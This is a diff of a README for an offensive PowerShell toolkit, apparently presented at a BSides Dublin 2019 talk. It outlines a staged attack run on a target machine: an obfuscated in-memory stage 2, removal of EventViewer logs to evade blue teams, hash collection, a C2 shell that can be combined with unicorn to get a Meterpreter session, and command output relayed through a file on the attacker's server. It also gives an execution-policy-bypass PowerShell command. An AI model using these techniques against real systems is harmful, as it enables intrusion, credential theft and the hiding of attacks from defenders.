kmkz/PowerShell/BsidesDublin-2019/README.md

    **Stage 2** (executed on target):

  In-memory build stage 2 using "-File" parameter (obfuscated PowerShell with random Class Derivation).

  Randomly generated class derivation and "EventViewer" logs removing for detection mechanisms/blue team evasion.

-  Stage 1 execution is not removed from logs for demo purpose, it should be modified for a total discretion ;).
+ Stage 1 execution is not removed from logs for debug purpose, it should be modified for a total discretion ;).

    [*] Notes:

 C2C shell could be used in combination to unicorn to obtains Meterpreter session (stage 2 could be modified depending on the use case):

         Examples: `powershell.exe -eXecUtIOnpOlICy BypAsS -File "\\Vboxsvr\shared\BSIDESIE\pwner.ps1"`

         IMPORTANT: Payload delivery using "-File" parameter also permit to add hashes collection when payload (stage 2) is triggered.

    **stage 3** (executed on target):

 Payload execution and output push/pull via a random file located on attacker's server.

 ## Demo